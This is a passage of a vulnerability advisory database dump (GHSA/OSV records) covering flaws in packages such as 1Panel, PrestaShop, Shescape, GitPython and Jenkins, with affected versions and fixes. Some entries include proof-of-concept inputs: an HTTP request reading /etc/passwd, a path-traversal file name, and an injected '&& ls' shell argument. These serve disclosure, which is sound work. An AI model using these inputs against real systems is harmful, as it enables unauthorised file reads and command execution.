{'ecosystem': 'npm', 'name': 'ses'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'fixed': '0.13.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ses'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.14.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ses'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.15.0'}, {'fixed': '0.15.24'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ses'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.16.0'}, {'fixed': '0.16.1'}]}], 'versions': ['0.16.0']}, {'package': {'ecosystem': 'npm', 'name': 'ses'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.17.0'}, {'fixed': '0.17.1'}]}], 'versions': ['0.17.0']}, {'package': {'ecosystem': 'npm', 'name': 'ses'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/endojs/endo/security/advisories/GHSA-9c4h-3f7h-322r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39532'}, {'type': 'WEB', 'url': 'https://github.com/endojs/endo/commit/fc90c6429604dc79ce8e3355e236ccce2bada041'}, {'type': 'PACKAGE', 'url': 'https://github.com/endojs/endo'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:43:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-4vqp-pcm3-73xp,2023-08-16T21:14:11Z,2023-08-16T15:30:17Z,,['CVE-2023-40336'],Jenkins Folders Plugin cross-site request forgery vulnerability,"Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to copy an item, which could potentially automatically approve unsandboxed scripts and allow the execution of unsafe scripts. Folders Plugin 6.848.ve3b_fd7839a_81 requires POST requests for the affected HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cloudbees-folder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.848.ve3b'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40336'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3106'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:14:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-85cf-gj29-f555,2023-08-10T20:09:24Z,2023-08-10T20:09:24Z,,['CVE-2023-39965'],1Panel Arbitrary File Download vulnerability,"### Summary Any file downloading vulnerability exists in 1Panel backend. ### Details Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access. ![image](https://user-images.githubusercontent.com/116613486/257246024-d0e35800-5fd8-4907-8b1b-504afaad859e.png) ### PoC payload: POST /api/v1/files/download/bypath HTTP/1.1 Host: ip Content-Type: application/json {""path"":""/etc/passwd""} ![f77959349e96543436eea18283fa75c](https://user-images.githubusercontent.com/116613486/257245459-13f2f31b-fcfe-4a27-ba52-e2f1e5d4d749.png) ### Impact Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/1Panel-dev/1Panel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.3'}, {'fixed': '1.5.0'}]}], 'versions': ['1.4.3']}]","[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-85cf-gj29-f555'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39965'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/1Panel'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/releases/tag/v1.5.0'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-10T20:09:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-gjvc-55fw-v6vq,2023-08-21T20:47:03Z,2023-08-21T20:28:03Z,,['CVE-2023-4455'],Wallabag user can delete own API client unintentionally,"# Description wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete API key via `/developer/client/delete/{id}` This vulnerability has a CVSSv3.1 score of 6.5. **You should immediately patch your instance to version 2.6.3 or higher if you have more than one user and/or having open registration**. # Resolution This action is now doable only via POST method, which ensures that we can't do it via a 3rd-party website. # Credits We would like to thank @tht1997 for reporting this issue through huntr.dev. Reference: https://huntr.dev/bounties/5ab1b206-5fe8-4737-b275-d705e76f193a/","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.6.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-gjvc-55fw-v6vq'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/ffcc5c9062fcc8cd922d7d6d65edbe5efae96806'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5ab1b206-5fe8-4737-b275-d705e76f193a/'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:28:03Z', 'nvd_published_at': None}" 1.4.0,GHSA-hpf4-v7v2-95p2,2023-09-07T21:28:14Z,2023-08-09T14:38:18Z,,['CVE-2023-39528'],PrestaShop file access through path traversal,"### Impact `displayAjaxEmailHTML` method can be used to read any file on the server, potentially even outside of the project if the server is not correctly configured. This vulnerability can be exacerbated when coupled with [CWE-502](https://cwe.mitre.org/data/definitions/502.html), which pertains to the Deserialization of Untrusted Data. Such a combination could potentially lead to a Remote Code Execution (RCE) vulnerability ### Patches 8.1.1 ### Found by Aleksey Solovev (Positive Technologies) ### Workarounds ### References ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-hpf4-v7v2-95p2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39528'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/11de3a84322fa4ecd0995ac40d575db61804724c'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:38:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-pg75-v6fp-8q59,2023-08-01T20:16:29Z,2023-08-01T20:16:29Z,,['CVE-2023-38200'],Keylime's registrar vulnerable to Denial-of-service attack via a single open connection,"### Impact Keylime `registrar` is prone to a simple denial of service attack in which an adversary opens a connection to the TLS port (by default, port `8891`) blocking further, legitimate connections. As long as the connection is open, the `registrar` is blocked and cannot serve any further clients (`agents` and `tenants`), which prevents normal operation. The problem does not affect the `verifier`. ### Patches Users should upgrade to release 7.4.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'keylime'}, 'ecosystem_specific': {'affected_functions': ['keylime.registrar_common.start', 'keylime.registrar_common.ProtectedHandler']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keylime/keylime/security/advisories/GHSA-pg75-v6fp-8q59'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38200'}, {'type': 'WEB', 'url': 'https://github.com/keylime/keylime/pull/1421'}, {'type': 'WEB', 'url': 'https://github.com/keylime/keylime/commit/c68d8f0b7ea549c12b6956ab0f3c28ae0360ae17'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-38200'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2222692'}, {'type': 'PACKAGE', 'url': 'https://github.com/keylime/keylime'}, {'type': 'WEB', 'url': 'https://github.com/keylime/keylime/releases/tag/v7.4.0'}]","{'cwe_ids': ['CWE-834'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T20:16:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-vxjg-hchx-cc4g,2023-08-04T18:41:47Z,2023-08-01T16:59:40Z,,['CVE-2023-38695'],@simonsmith/cypress-image-snapshothas fix for insecure snapshot file names,"### Impact It's possible for a user to pass a relative file path for the snapshot name and reach outside of the project directory into the machine running the test. Example: ```js cy.get('h1').matchImageSnapshot('../../../ignore-relative-dirs') ``` The above will create an `ignore-relative-dirs.png` three levels up ### Patches Fixed in `8.0.2` ### Workarounds Validate all the existing uses of `matchImageSnapshot` to ensure correct use of the filename argument. Example: ```js // snapshot name will be the test title cy.matchImageSnapshot(); // snapshot name will be the name passed in cy.matchImageSnapshot('login'); ``` ### References https://github.com/simonsmith/cypress-image-snapshot/issues/15 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@simonsmith/cypress-image-snapshot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.0.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/simonsmith/cypress-image-snapshot/security/advisories/GHSA-vxjg-hchx-cc4g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38695'}, {'type': 'WEB', 'url': 'https://github.com/simonsmith/cypress-image-snapshot/issues/15'}, {'type': 'WEB', 'url': 'https://github.com/simonsmith/cypress-image-snapshot/commit/ef49519795daf5183f4fac6f3136e194f20f39f4'}, {'type': 'PACKAGE', 'url': 'https://github.com/simonsmith/cypress-image-snapshot'}, {'type': 'WEB', 'url': 'https://github.com/simonsmith/cypress-image-snapshot/releases/tag/8.0.2'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T16:59:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-g3v6-r8p9-wxg9,2023-08-11T21:53:22Z,2023-08-11T09:30:36Z,,['CVE-2023-4105'],Mattermost fails to correctly delete attachments,"Mattermost fails to delete the attachments when deleting a message in a thread allowing a simple user to still be able to access and download the attachment of a deleted message ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.9.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.10.3'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.8.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4105'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}, {'type': 'PACKAGE', 'url': 'github.com/mattermost/mattermost'}]","{'cwe_ids': ['CWE-284', 'CWE-862'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:53:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-jp5r-4x9q-4vcf,2023-08-17T13:52:15Z,2023-08-11T15:30:46Z,,['CVE-2020-24922'],xuxueli xxl-job Cross-Site Request Forgery Vulnerability,Cross Site Request Forgery (CSRF) vulnerability in `xxl-job-admin/user/add` in xuxueli xxl-job version 2.2.0 allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.xuxueli:xxl-job'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24922'}, {'type': 'WEB', 'url': 'https://github.com/xuxueli/xxl-job/issues/1921'}, {'type': 'PACKAGE', 'url': 'https://github.com/xuxueli/xxl-job'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:11:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-rq5c-hvw6-8pr7,2023-08-29T17:35:55Z,2023-08-29T17:35:55Z,,['CVE-2023-39348'],Improper log output when using GitHub Status Notifications in spinnaker,"### Impact ONLY IMPACTS those use GitHub Status Notifications Log output when updating GitHub status is improperly set to FULL always. It's recommended to apply the patch and rotate the GitHub token used for github status notifications. Given that this would output github tokens to a log system, the risk is slightly higher than a ""low"" since token exposure could grant elevated access to repositories outside of control. If using READ restricted tokens, the exposure is such that the token itself could be used to access resources otherwise restricted from reads. ### Patches Patch is in progress. https://github.com/spinnaker/echo/pull/1316 ### Workarounds Disable GH Status Notifications. Filter your logs for Echo log data. Use read-only tokens that are limited in scope. ### References sig-security in slack: https://spinnakerteam.slack.com/archives/CFN8F5UR2 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/spinnaker/spinnaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.28.8'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/spinnaker/spinnaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.29.0'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.29.6'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/spinnaker/spinnaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.30.0'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.30.3'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/spinnaker/spinnaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.31.0'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.31.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/spinnaker/spinnaker/security/advisories/GHSA-rq5c-hvw6-8pr7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39348'}, {'type': 'WEB', 'url': 'https://github.com/spinnaker/echo/pull/1316'}, {'type': 'PACKAGE', 'url': 'https://github.com/spinnaker/spinnaker'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:35:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-q4pp-j36h-3gqg,2023-08-24T12:53:06Z,2023-08-24T12:53:06Z,,[],Minimal `basti` IAM Policy Allows Shell Access,"### Summary The provided Minimal IAM Policy for `bastic connect` does not include `ssm:SessionDocumentAccessCheck`. This results in the ability to get a shell session on the bastion, not just the intended access for Port Forwarding. ### Details `basti connect` is designed to ""securely connect to your RDS/Aurora/Elasticache/EC2 instances"", using a bastion instance ""with [AWS Session Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager.html) port forwarding capability to make the target available on your localhost."" The [Minimal IAM Policy](https://github.com/BohdanPetryshyn/basti#minimal-iam-permissions) allows port forwarding via the following statement: ``` { ""Effect"": ""Allow"", ""Action"": ""ssm:StartSession"", ""Resource"": [ ""arn:aws:ssm:*:*:document/AWS-StartPortForwardingSessionToRemoteHost"", ""arn:aws:ec2:::instance/"" ] } ``` This statement does not include the following condition: ``` ""Condition"": { ""BoolIfExists"": { ""ssm:SessionDocumentAccessCheck"": ""true"" } } ``` As a result, the `basti connect` minimal policy is logically identical to: ``` { ""Effect"": ""Allow"", ""Action"": ""ssm:StartSession"", ""Resource"": [ ""arn:aws:ssm:*:*:document/AWS-StartPortForwardingSessionToRemoteHost"", ""arn:aws:ssm:*:*:document/SSM-SessionManagerRunShell"", ""arn:aws:ec2:::instance/"" ] } ``` A `basti` admin would expect users under the minimal policy to be able to port forward. However, they could also get a shell on the bastion. For more details on this footgun, see: https://ramimac.me/ssm-iam ### PoC _Complete instructions, including specific configuration details, to reproduce the vulnerability._ ### Impact Impact would depend on configuration/hardening of the bastion. I've seen examples where bastions have credentials to downstream systems in configuration or memory that would be exposed. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'basti-cdk'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/BohdanPetryshyn/basti/security/advisories/GHSA-q4pp-j36h-3gqg'}, {'type': 'WEB', 'url': 'https://github.com/BohdanPetryshyn/basti/commit/f6f218e7cd450e29aeb616960b7abbe8dfc87796'}, {'type': 'PACKAGE', 'url': 'https://github.com/BohdanPetryshyn/basti'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T12:53:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-g3m9-pr5m-4cvp,2023-09-01T19:43:01Z,2023-08-28T09:30:20Z,,['CVE-2023-27604'],Airflow Sqoop Provider RCE Vulnerability,"Apache Airflow Sqoop Provider, versions before 4.0.0, is affected by a vulnerability that allows an attacker pass parameters with the connections, which makes it possible to implement RCE attacks via ‘sqoop import --connect’, obtain airflow server permissions, etc. The attacker needs to be logged in and have authorization (permissions) to create/edit connections. It is recommended to upgrade to a version that is not affected. This issue was reported independently by happyhacking-k, And Xie Jianming and LiuHui of Caiji Sec Team also reported it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-sqoop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27604'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/33039'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/lswlxf11do51ob7f6xyyg8qp3n7wdrgd'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:15:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-5pv6-rprw-82wv,2023-08-31T00:00:29Z,2023-08-22T21:30:26Z,,['CVE-2022-45582'],Horizon Web Dashboard Open Redirect vulnerability,Open Redirect vulnerability in Horizon Web Dashboard 19.4.0 thru 20.1.4 via the success_url parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'horizon'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45582'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/horizon/+bug/1982676'}, {'type': 'PACKAGE', 'url': 'https://github.com/openstack/horizon'}, {'type': 'WEB', 'url': 'https://github.com/openstack/horizon/blob/master/horizon/workflows/views.py#L96-L102'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/horizon/PYSEC-2023-153.yaml'}, {'type': 'WEB', 'url': 'https://opendev.org/openstack/horizon/commit/79d139594290779b2f74ca894332aa7f2f7e4735'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T13:21:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-ch6w-mc6c-g65g,2023-08-22T18:09:10Z,2023-08-21T18:31:23Z,2023-08-22T18:09:10Z,[],Duplicate Advisory: weaviate denial of service vulnerability,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-8697-479h-5mfp. This link is maintained to preserve external references. ## Original Description An issue in weaviate v.1.20.0 allows a remote attacker to cause a denial of service via the `handleUnbatchedGraphQLRequest` function.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.20.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38976'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/issues/3258'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaviate/weaviate'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:41:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-cj8w-v588-p8wx,2023-08-31T14:49:19Z,2023-08-29T00:32:04Z,,['CVE-2023-40828'],pf4j vulnerable to remote code execution via expandIfZip method in the extract function,An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the expandIfZip method in the extract function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.pf4j:pf4j'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40828'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/pull/537'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/pull/538'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/commit/8e0aa198c4e652cfc1eb9e05ca9b64397f67cc72'}, {'type': 'PACKAGE', 'url': 'https://github.com/pf4j/pf4j'}]","{'cwe_ids': ['CWE-22', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:40:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-j55r-787p-m549,2023-09-01T19:46:34Z,2023-08-22T18:00:04Z,,['CVE-2023-40185'],Shescape on Windows escaping may be bypassed in threaded context,"### Impact This may impact users that use Shescape on Windows in a threaded context (e.g. using [Worker threads](https://nodejs.org/api/worker_threads.html)). The vulnerability can result in Shescape escaping (or quoting) for the wrong shell, thus allowing attackers to bypass protections depending on the combination of expected and used shell. This snippet demonstrates a vulnerable use of Shescape: ```javascript // vulnerable.js import { exec } from ""node:child_process""; import { Worker, isMainThread } from 'node:worker_threads'; import * as shescape from ""shescape""; if (isMainThread) { // 1. Something like a worker thread must be used. The reason being that they // unexpectedly change environment variable names on Windows. new Worker(""./vulnerable.js""); } else { // 2. Example configuration that's problematic. In this setup example the // expected default system shell is CMD. We configure the use of PowerShell. // Shescape will fail to look up PowerShell and default to escaping for CMD // instead, resulting in the vulnerability. const options = { shell: ""powershell"", interpolation: true, }; // 3. Using shescape to protect against attacks, this is correct. const escaped = shescape.escape(""&& ls"", options); // 4. Invoking a command with the escaped user input, this is vulnerable in // this case. exec(`echo Hello ${escaped}`, options, (error, stdout) => { if (error) { console.error(`An error occurred: ${error}`); } else { console.log(stdout); } }); } ``` ### Patches This bug has been patched in [v1.7.4](https://github.com/ericcornelissen/shescape/releases/tag/v1.7.4) which you can upgrade to now. No further changes are required. ### Workarounds If you are impacted there is no workaround possible. ### References - Shescape Pull Request [#1142](https://github.com/ericcornelissen/shescape/pull/1142) - Shescape commit [`0b976da`](https://github.com/ericcornelissen/shescape/commit/0b976dab645abf45ffd85e74a8c6e51ee2f42d63) - Shescape release [v1.7.4](https://github.com/ericcornelissen/shescape/releases/tag/v1.7.4) ### For more information - Comment on Pull Request [#1142](https://github.com/ericcornelissen/shescape/pull/1142) - Comment on commit [`0b976da`](https://github.com/ericcornelissen/shescape/commit/0b976dab645abf45ffd85e74a8c6e51ee2f42d63) - Open an issue at [https://github.com/ericcornelissen/shescape/issues](https://github.com/ericcornelissen/shescape/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc) (New issue > Question > Get started)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'shescape'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-j55r-787p-m549'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40185'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/pull/1142'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/commit/0b976dab645abf45ffd85e74a8c6e51ee2f42d63'}, {'type': 'PACKAGE', 'url': 'https://github.com/ericcornelissen/shescape'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/releases/tag/v1.7.4'}]","{'cwe_ids': ['CWE-150'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T18:00:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-pr76-5cm5-w9cj,2023-08-18T15:48:20Z,2023-08-11T09:30:36Z,,['CVE-2023-40267'],GitPython vulnerable to remote code execution due to insufficient sanitization of input arguments,"GitPython before 3.1.32 does not block insecure non-multi options in `clone` and `clone_from`, making it vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments. NOTE: this issue exists because of an incomplete fix for CVE-2022-24439.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'GitPython'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.32'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40267'}, {'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/pull/1609'}, {'type': 'WEB', 'url': 